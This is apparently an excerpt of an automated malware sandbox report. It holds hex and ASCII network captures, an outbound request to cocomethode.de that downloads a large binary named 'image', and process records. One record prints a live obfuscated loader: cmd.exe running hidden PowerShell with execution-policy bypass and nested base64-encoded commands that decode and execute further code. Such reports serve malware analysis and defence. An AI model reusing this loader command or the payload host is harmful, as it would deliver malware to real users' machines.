2024-12-11 11:45:35 UTC	1369	IN	Data Raw: 1f 26 53 27 e5 6e ad f6 cf 4c ed 0e 26 6e ab 23 ad 28 80 26 6e ad 26 6e ab 2b 5f a4 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 6c ed 0e 26 6e ab 23 55 28 80 26 6e ad 26 6e ab 2b 57 a4 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 0c ed 0e 26 6e ab 23 5d 28 80 26 6e ad 26 6e ab 2b 57 a4 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 2c ed 0e 26 6e ab 23 45 28 80 26 6e ad 26 6e ab 2b 47 a4 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf cc ec 0e 26 6e ab 23 45 28 80 26 6e ad 26 6e ab 2b 67 a5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ec ec 0e 26 6e ab 23 6d 28 80 26 6e ad 26 6e ab 2b 0f a5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 8c ec 0e 26 6e ab 23 15 28 80 26 6e ad 26 6e ab 2b 37 a5 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ac ec 0e 26 6e ab 23 3d 28 80 26 6e ad 26 6e ab 2b df a4 7e 26 6e Data Ascii: &S'nL&n#(&n&n+_~&n&S'nl&n#U(&n&n+W~&n&S'n&n#](&n&n+W~&n&S'n,&n#E(&n&n+G~&n&S'n&n#E(&n&n+g~&n&S'n&n#m(&n&n+~&n&S'n&n#(&n&n+7~&n&S'n&n#=(&n&n+~&n
2024-12-11 11:45:35 UTC	80	IN	Data Raw: 2b e7 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 2c e0 0e 26 6e ab 23 fd 2d 80 26 6e ad 26 6e ab 2b 8f a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf cc e3 0e 26 6e ab 23 ed 2d 80 26 6e ad 26 6e ab 2b b7 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf Data Ascii: +~&n&S'n,&n#-&n&n+~&n&S'n&n#-&n&n+~&n&S'n
2024-12-11 11:45:35 UTC	1369	IN	Data Raw: ec e3 0e 26 6e ab 23 95 2d 80 26 6e ad 26 6e ab 2b 5f a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 8c e3 0e 26 6e ab 23 bd 2d 80 26 6e ad 26 6e ab 2b 47 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ac e3 0e 26 6e ab 23 a5 2d 80 26 6e ad 26 6e ab 2b 6f a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 4c e3 0e 26 6e ab 23 4d 2d 80 26 6e ad 26 6e ab 2b 17 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 6c e3 0e 26 6e ab 23 45 2d 80 26 6e ad 26 6e ab 2b 17 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 0c e3 0e 26 6e ab 23 6d 2d 80 26 6e ad 26 6e ab 2b 3f a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 2c e3 0e 26 6e ab 23 15 2d 80 26 6e ad 26 6e ab 2b 27 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf cc e2 0e 26 6e ab 23 05 2d 80 26 6e ad 26 6e ab 2b 27 a6 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 Data Ascii: &n#-&n&n+_~&n&S'n&n#-&n&n+G~&n&S'n&n#-&n&n+o~&n&S'nL&n#M-&n&n+~&n&S'nl&n#E-&n&n+~&n&S'n&n#m-&n&n+?~&n&S'n,&n#-&n&n+'~&n&S'n&n#-&n&n+'~&n&S'n
2024-12-11 11:45:35 UTC	1369	IN	Data Raw: 53 27 e5 6e ad f6 cf 4c e6 0e 26 6e ab 23 2d 2f 80 26 6e ad 26 6e ab 2b 9f 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 6c e6 0e 26 6e ab 23 d5 2e 80 26 6e ad 26 6e ab 2b 97 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 0c e6 0e 26 6e ab 23 fd 2e 80 26 6e ad 26 6e ab 2b bf 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 2c e6 0e 26 6e ab 23 e5 2e 80 26 6e ad 26 6e ab 2b b7 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf cc 99 0e 26 6e ab 23 95 2e 80 26 6e ad 26 6e ab 2b 5f 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ec 99 0e 26 6e ab 23 95 2e 80 26 6e ad 26 6e ab 2b 87 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 8c 99 0e 26 6e ab 23 bd 2e 80 26 6e ad 26 6e ab 2b b7 58 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ac 99 0e 26 6e ab 23 a5 2e 80 26 6e ad 26 6e ab 2b 5f 58 7e 26 6e a5 1f Data Ascii: S'nL&n#-/&n&n+X~&n&S'nl&n#.&n&n+X~&n&S'n&n#.&n&n+X~&n&S'n,&n#.&n&n+X~&n&S'n&n#.&n&n+_X~&n&S'n&n#.&n&n+X~&n&S'n&n#.&n&n+X~&n&S'n&n#.&n&n+_X~&n
2024-12-11 11:45:35 UTC	1369	IN	Data Raw: 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 2c 9d 0e 26 6e ab 23 35 20 80 26 6e ad 26 6e ab 2b 8f 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf cc 9c 0e 26 6e ab 23 25 20 80 26 6e ad 26 6e ab 2b b7 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ec 9c 0e 26 6e ab 23 25 20 80 26 6e ad 26 6e ab 2b af 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 8c 9c 0e 26 6e ab 23 cd 23 80 26 6e ad 26 6e ab 2b 57 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf ac 9c 0e 26 6e ab 23 f5 23 80 26 6e ad 26 6e ab 2b 7f 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 4c 9c 0e 26 6e ab 23 ed 23 80 26 6e ad 26 6e ab 2b 77 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 6c 9c 0e 26 6e ab 23 dd 23 80 26 6e ad 26 6e ab 2b 1f 5a 7e 26 6e a5 1f 26 53 27 e5 6e ad f6 cf 0c 9c 0e 26 6e ab 23 c5 23 80 26 6e ad 26 6e ab 2b Data Ascii: Z~&n&S'n,&n#5 &n&n+Z~&n&S'n&n#% &n&n+Z~&n&S'n&n#% &n&n+Z~&n&S'n&n##&n&n+WZ~&n&S'n&n##&n&n+Z~&n&S'nL&n##&n&n+wZ~&n&S'nl&n##&n&n+Z~&n&S'n&n##&n&n+

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:46:29 UTC	71	OUT	GET /StaticFile/TermServiceTryRun/77 HTTP/1.1 Host: cocomethode.de
2024-12-11 11:46:30 UTC	1343	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:46:30 GMT Content-Type: application/octet-stream Content-Length: 2183168 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: BFF2365257251B6BA227A5E748DBD62E CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LYTUukVWg4CKtAWRRFSrvBW1TZ5It2LvrL81oGeQyCpQegPzTa2%2FV72mr5yGnHJxGfi6iawEmTRa5y0PYlbz2bv42dIk3wLdms%2Fg8NQmM6deKd5jgRDM3M5e3FZPVzTwg88476%2BF%2B9s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=32153&min_rtt=1163&rtt_var=31372&sent=16&recv=18&lost=0&retrans=0&sent_bytes=4612&recv_bytes=5018&delivery_rate=28906&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053c09c994d1b7-ATL server-timing: cfL4;desc="?proto=TCP&rtt=30&min_rtt=30&rtt_var=15&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=64&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113916&min_rtt=113801&rtt_var=24183&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=709&delivery_rate=33547&cwnd=252&unsent_bytes=0&cid=fd9bbac2152e07d6&ts=844&x=0"
2024-12-11 11:46:30 UTC	26	IN	Data Raw: 00 17 1d 4d 4f 4d 4d 4d 49 4d 42 4d b2 b2 4d 4d f5 4d 4d 4d 4d 4d 4d 4d 0d 4d Data Ascii: MOMMMIMBMMMMMMMMMMM
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 57 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4c 4d 4d f7 5d 4d 43 52 f9 44 80 6c f5 4c 01 80 6c dd dd 19 25 24 3e 6d 3d 3f 22 2a 3f 2c 20 6d 20 38 3e 39 6d 2f 28 6d 3f 38 23 6d 38 23 29 28 3f 6d 1a 24 23 7e 7f 40 47 69 7a 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 1d 08 4d 4d 01 4c 46 4d 79 15 a3 2b 4d 4d 4d 4d 4d 4d 4d 4d ad 4d 4f 4c 46 Data Ascii: WMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMLMM]MCRDlLl%$>m=?"*?, m 8>9m/(m?8#m8#)(?m$#~@GizMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMLFMy+MMMMMMMMMOLF
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 4d 4c 47 03 2c 39 24 3b 28 18 04 23 39 48 4d 4d 4d 4d b2 b2 b2 b2 4f 4d 4d dd 5c 0d 4d 49 4b 1e 24 23 2a 21 28 4d 4f 4d 4d ed 5c 0d 4d 49 45 08 35 39 28 23 29 28 29 4f 4f 4d 4d 4d 4d f9 5c 0d 4d 49 4b 09 22 38 2f 21 28 4c 4f 4d 4d 89 5c 0d 4d 49 49 0e 22 20 3d 4e 4f 4d 4d 4d 4d 99 5c 0d 4d 49 45 0e 38 3f 3f 28 23 2e 34 49 4f 4d 4d 4d 4d a5 5c 0d 4d 48 46 1e 25 22 3f 39 1e 39 3f 24 23 2a b2 4f 4d b1 5c 0d 4d 59 44 1d 0c 23 3e 24 0e 25 2c 3f 7d 5d 0d 4d 4f 4d 4d 4d 4d 59 5f 0d 4d 59 44 1d 1a 24 29 28 0e 25 2c 3f 01 5d 0d 4d 4f 4d 4d 4d 4d 61 5f 0d 4d 4e 45 0f 34 39 28 0f 22 22 21 4d 4d 4d 4d cd b2 b2 b2 32 65 5f 0d 4d 48 0b 2c 21 3e 28 49 19 3f 38 28 4b 1e 34 3e 39 28 20 4f 4d 4d 11 5f 0d 4d 4e 45 1a 22 3f 29 0f 22 22 21 4f 4d 4d 4d cd b2 b2 b2 32 15 5f 0d Data Ascii: MLG,9$;(#9HMMMMOMM\MIK$#!(MOMM\MIE59(#)()OOMMMM\MIK"8/!(LOMM\MII" =NOMMMM\MIE8??(#.4IOMMMM\MHF%"?99?$#OM\MYD#>$%,?}]MOMMMMY_MYD$)(%,?]MOMMMMa_MNE49(""!MMMM2e_MH,!>(I?8(K4>9( OMM_MNE"?)""!OMMM2_
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 4d 4f 5f d5 58 0d 4d 49 01 28 2b 39 4f 4d 5f d5 58 0d 4d 48 1f 24 2a 25 39 4f 4d 4f 4d 46 e9 c3 0d 4d 5e 6b 22 3d 12 01 28 3e 3e 19 25 2c 23 02 3f 08 3c 38 2c 21 4d 4d 4d 5d 0d 4d 4f 5f d5 58 0d 4d 49 01 28 2b 39 4f 4d 5f d5 58 0d 4d 48 1f 24 2a 25 39 4f 4d 4f 4d 31 5a 0d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d ed 52 0d 4d 4d 4d 4d 4d 31 5a 0d 4d 4d 4d 4d 4d df 55 0d 4d 45 4d 4d 4d 4d 4d 4d 4d 51 dd 0d 4d 69 dd 0d 4d 41 de 0d 4d 49 de 0d 4d 69 de 0d 4d 65 de 0d 4d 61 de 0d 4d 6d de 0d 4d a1 c0 0d 4d 49 c3 0d 4d bd c3 0d 4d 4d 4d 6f 4d d7 55 0d 4d 09 4d b9 b2 8d 55 0d 4d 0f 4d b9 b2 a9 55 0d 4d 0f 4d b9 b2 40 54 0d 4d 0e 4d b9 b2 06 54 0d 4d 0f 4d b9 b2 37 54 0d 4d 0f 4d b9 b2 ee 54 0d 4d 0e 4d b9 b2 9a 54 0d 4d 0e 4d b9 b2 5d 57 0d 4d 0e 4d b9 b2 76 57 0d Data Ascii: MO_XMI(+9OM_XMH$%9OMOMFM^k"=(>>%,#?<8,!MMM]MO_XMI(+9OM_XMH$%9OMOM1ZMMMMMMMMMMMMMRMMMMM1ZMMMMMUMEMMMMMMMQMiMAMIMiMeMaMmMMIMMMMoMUMMUMMUMM@TMMTMM7TMMTMMTMM]WMMvW
2024-12-11 11:46:30 UTC	741	IN	Data Raw: 21 2b 4f 4d 4f f5 5f 0d 4d 4c 4d 49 03 2c 20 28 4f 4d 4f 4d 0b 4d 65 dd 0d 4d 41 0a 28 39 04 23 39 28 3f 2b 2c 2e 28 4e 4d 4d 5d 0d 4d 45 4d 4e 45 d1 52 0d 4d 4d 4d 49 1e 28 21 2b 4f 4d 5f 0d 5e 0d 4d 4c 4d 4e 04 04 09 4f 4d 6d 4d 4d 4d 4d 4f 4d 4e 02 2f 27 4f 4d 4f 4d 73 4d c1 dd 0d 4d 5c 0a 28 39 04 23 39 28 3f 2b 2c 2e 28 08 23 39 3f 34 4e 4d ed 59 0d 4d 45 4d 4f 4d 4d 4d 4d 4d 4d 4d 49 1e 28 21 2b 4f 4d 5f 0d 5e 0d 4d 4c 4d 4e 04 04 09 4f 4d 4f 4d 7c 4d 59 c2 0d 4d 5c 0a 28 39 04 23 39 28 3f 2b 2c 2e 28 19 2c 2f 21 28 4e 4d 61 58 0d 4d 45 4d 4c 4d 4d 4d 4d 4d 4d 4d 49 1e 28 21 2b 4f 4d 4f 4d 7e 4d 9d dd 0d 4d 45 18 23 24 39 03 2c 20 28 4e 4d f5 5f 0d 4d 45 4d 4f 4d 4d 4d 4d 4d 4d 4d 49 1e 28 21 2b 4f 4d 0d f5 5f 0d 4d 4c 4d 4c 4c 4f 4d 4f 4d 79 4d 75 Data Ascii: !+OMO_MLMI, (OMOMMeMA(9#9(?+,.(NMM]MEMNERMMMI(!+OM_^MLMNOMmMMMMOMN/'OMOMsMM\(9#9(?+,.(#9?4NMYMEMOMMMMMMMI(!+OM_^MLMNOMOM\|MYM\(9#9(?+,.(,/!(NMaXMEMLMMMMMMMI(!+OMOM~MME#$9, (NM_MEMOMMMMMMMI(!+OM_MLMLLOMOMyMu
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 4d 4d 4d 4c 4d 4a 00 28 3e 3e 2c 2a 28 4f 4d 4f 4d 66 4d a1 c0 0d 4d 46 03 28 3a 04 23 3e 39 2c 23 2e 28 4e 4d d1 52 0d 4d 45 4d 4c 4d 4d 4d 4d 4d 4d 4d 49 1e 28 21 2b 4f 4d 4f 4d 61 4d 49 c3 0d 4d 41 0b 3f 28 28 04 23 3e 39 2c 23 2e 28 4e 4d 4d 4d 4d 4d 45 4d 4c 45 d1 52 0d 4d 4d 4d 49 1e 28 21 2b 4f 4d 4f 4d 6a 4d bd c3 0d 4d 4a 09 28 3e 39 3f 22 34 4e 4d 4d 4d 4d 4d 45 4d 4c 45 d1 52 0d 4d 4d 4d 49 1e 28 21 2b 4f 4d 4f 4d 4d 4d 4d ed 52 0d 4d 4a 4a 19 02 2f 27 28 2e 39 31 5a 0d 4d 4d 4d 4d 4d 4d 4d 4b 1e 34 3e 39 28 20 4d 4d 4d 4d 4f 4d 4d 4d 4d 4d 51 6d 0d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 75 6d 0d 4d 4d 4d 4d 4d 51 6d 0d 4d 4d 4d 4d 4d 6f 6d 0d 4d 45 4d 4d 4d 69 5a 0d 4d 51 dd 0d 4d 69 dd 0d 4d 41 de 0d 4d 49 de 0d 4d 69 de 0d 4d 65 de 0d 4d 61 Data Ascii: MMMLMJ(>>,*(OMOMfMMF(:#>9,#.(NMRMEMLMMMMMMMI(!+OMOMaMIMA?((#>9,#.(NMMMMMEMLERMMMI(!+OMOMjMMJ(>9?"4NMMMMMEMLERMMMI(!+OMOMMMMRMJJ/'(.91ZMMMMMMMK4>9( MMMMOMMMMMQmMMMMMMMMMMMMMumMMMMMQmMMMMMomMEMMMiZMQMiMAMIMiMeMa
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 45 db 0d 4d 48 08 23 39 28 3f 4d 4d 4d 4d 4d 4d 4d 4f 4d 45 79 db 0d 4d 49 08 35 24 39 4d 4d 4d 4d 4d 4d 4d 4f 4d 4d 4d 4d dd 69 0d 4d 43 45 19 00 22 23 24 39 22 3f 51 4d 4d 4d 4d 4d 4d 4d 4d 4a 4d 4d 4d d1 5d 0d 4d 4d 4d 4d 4d 4d 47 0b 01 22 2e 26 0e 22 38 23 39 41 4d 7d 6f 0d 4d 9d c3 0d 4d 4d 4d d1 5d 0d 4d 49 4d 4d 4d 4d 42 0b 1f 28 2e 38 3f 3e 24 22 23 0e 22 38 23 39 4f 4d a9 5d 0d 4d 45 4d 4d 4d 4d 40 0b 02 3a 23 24 23 2a 19 25 3f 28 2c 29 4f 4d 4d 5c 0d 4d 41 4d 4d 4d 4d 47 0b 01 22 2e 26 08 3b 28 23 39 4f 4d d1 5d 0d 4d 5d 4d 4d 4d 4d 47 0b 1e 3d 24 23 0e 22 38 23 39 4f 4d d1 6e 0d 4d 59 4d 4d 4d 4d 47 0b 1a 2c 24 39 1c 38 28 38 28 4f 4d 65 69 0d 4d 55 4d 4d 4d 4d 47 0b 1c 38 28 38 28 01 22 2e 26 4f 4d 4f 4d 44 4d 44 2d d0 0d 4d 41 1e 28 39 1e 3d Data Ascii: EMH#9(?MMMMMMMOMEyMI5$9MMMMMMMOMMMMiMCE"#$9"?QMMMMMMMMJMMM]MMMMMMG".&"8#9AM}oMMMM]MIMMMMB(.8?>$"#"8#9OM]MEMMMM@:#$#*%?(,)OMM\MAMMMMG".&;(#9OM]M]MMMMG=$#"8#9OMnMYMMMMG,$98(8(OMeiMUMMMMG8(8(".&OMOMDMD-MA(9=
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 59 67 0d 4d d5 64 0d 4d 4d 4d 4d 4d 4d 4d 4d 4d 7d 67 0d 4d 4d 4d 4d 4d 59 67 0d 4d 4d 4d 4d 4d 57 67 0d 4d 41 4d 4d 4d 69 5a 0d 4d 51 dd 0d 4d 69 dd 0d 4d 41 de 0d 4d 49 de 0d 4d 69 de 0d 4d 65 de 0d 4d 61 de 0d 4d 6d de 0d 4d a1 c0 0d 4d 49 c3 0d 4d bd c3 0d 4d 4d 4d 4d 4d 4d 4d 5c 19 03 22 1f 28 2b 0e 22 38 23 39 02 2f 27 28 2e 39 7d 67 0d 4d 4a 5c 19 03 22 1f 28 2b 0e 22 38 23 39 02 2f 27 28 2e 39 59 67 0d 4d d1 52 0d 4d 4d 4d 4b 1e 34 3e 39 28 20 4d 4d 4d 4d 4f 4d 4d 4d 2d 67 0d 4d 59 41 1d 1e 25 22 3f 39 1e 39 3f 24 23 2a a9 5c 0d 4d 4f 4d 35 67 0d 4d 47 47 18 19 0b 75 1e 39 3f 24 23 2a a4 b0 4f 4d c1 67 0d 4d 47 40 1f 2c 3a 0f 34 39 28 1e 39 3f 24 23 2a b2 b2 4f 4d 4d e9 67 0d 4d 59 48 1d 0f 34 39 28 f9 5d 0d 4d 4f 4d 4d 4d 4d f5 67 0d 4d 59 4b 1d Data Ascii: YgMdMMMMMMMMM}gMMMMMYgMMMMMWgMAMMMiZMQMiMAMIMiMeMaMmMMIMMMMMMMM\"(+"8#9/'(.9}gMJ\"(+"8#9/'(.9YgMRMMMK4>9( MMMMOMMM-gMYA%"?99?$#\MOM5gMGGu9?$#OMgMG@,:49(9?$#*OMMgMYH49(]MOMMMMgMYK
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: 4d 4d 4d 4f 4b 1b 1a 22 3f 29 3e 4f 4d 4d 4d 4d 4d 4f 4d 4d 4d 4f 4b 1b 0f 34 39 28 3e 4f 4d 4d 4d 4d 4d 4d 4d 4d 4d 4f 4a 1f 2c 3a 09 2c 39 2c 4f 4d 4f 4d 4d 4d 4d 1d 62 0d 4d 4e 44 19 19 34 3d 28 06 24 23 29 4c 4d 4d 4d 4d 5b 4d 4d 4d 01 62 0d 4d 44 39 26 18 23 26 23 22 3a 23 44 39 26 04 23 39 28 2a 28 3f 4b 39 26 0e 25 2c 3f 40 39 26 08 23 38 20 28 3f 2c 39 24 22 23 4a 39 26 0b 21 22 2c 39 45 39 26 1e 39 3f 24 23 2a 48 39 26 1e 28 39 4a 39 26 0e 21 2c 3e 3e 45 39 26 00 28 39 25 22 29 4a 39 26 1a 0e 25 2c 3f 44 39 26 01 1e 39 3f 24 23 2a 44 39 26 1a 1e 39 3f 24 23 2a 44 39 26 1b 2c 3f 24 2c 23 39 4a 39 26 0c 3f 3f 2c 34 45 39 26 1f 28 2e 22 3f 29 46 39 26 04 23 39 28 3f 2b 2c 2e 28 4a 39 26 04 23 39 7b 79 47 39 26 09 34 23 0c 3f 3f 2c 34 44 39 26 18 1e Data Ascii: MMMOK"?)>OMMMMMOMMMOK49(>OMMMMMMMMMOJ,:,9,OMOMMMMbMND4=($#)LMMMM[MMMbMD9&#&#":#D9&#9((?K9&%,?@9&#8 (?,9$"#J9&!",9E9&9?$#H9&(9J9&!,>>E9&(9%")J9&%,?D9&9?$#D9&9?$#D9&,?$,#9J9&??,4E9&(."?)F9&#9(?+,.(J9&#9{yG9&4#??,4D9&
2024-12-11 11:46:30 UTC	1369	IN	Data Raw: b9 b2 4e 72 0d 4d 0e 4d b9 b2 1b 72 0d 4d 0e 4d b9 b2 e4 72 0d 4d 0e 4d b9 b2 b1 72 0d 4d 0e 4d b9 b2 00 0d 0d 4d 0e 4d b9 b2 df 0d 0d 4d 0e 4d b9 b2 95 0d 0d 4d 0e 4d b9 b2 53 0c 0d 4d 0e 4d b9 b2 29 0c 0d 4d 0e 4d b9 b2 e5 0c 0d 4d 0e 4d b9 b2 bb 0c 0d 4d 0e 4d b9 b2 61 0f 0d 4d 0e 4d b9 b2 29 0f 0d 4d 0e 4d b9 b2 ed 0f 0d 4d 0e 4d b9 b2 96 0f 0d 4d 0e 4d b9 b2 54 0e 0d 4d 0e 4d b9 b2 24 0e 0d 4d 0e 4d b9 b2 e7 0e 0d 4d 0e 4d b9 b2 ab 0e 0d 4d 0e 4d b9 b2 79 09 0d 4d 0e 4d b9 b2 3f 09 0d 4d 0e 4d b9 b2 e3 09 0d 4d 0e 4d b9 b2 4e 08 0d 4d 0e 4d b9 b2 27 08 0d 4d 0e 4d b9 b2 8f 08 0d 4d 0e 4d b9 b2 5a 0b 0d 4d 0e 4d b9 b2 c8 0b 0d 4d 0e 4d b9 b2 a9 0b 0d 4d 0e 4d b9 b2 0d 0a 0d 4d 0e 4d b9 b2 eb 0a 0d 4d 0e 4d b9 b2 53 05 0d 4d 0e 4d b9 b2 dc 05 0d 4d 0e Data Ascii: NrMMrMMrMMrMMMMMMMMSMM)MMMMMMaMM)MMMMMMTMM$MMMMMMyMM?MMMMNMM'MMMMZMMMMMMMMMMSMMM

Target ID:	0
Start time:	06:43:58
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Imagebase:	0x7ff6dc180000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	06:44:01
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\st5qs1wr\st5qs1wr.cmdline"
Imagebase:	0x7ff6fee20000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true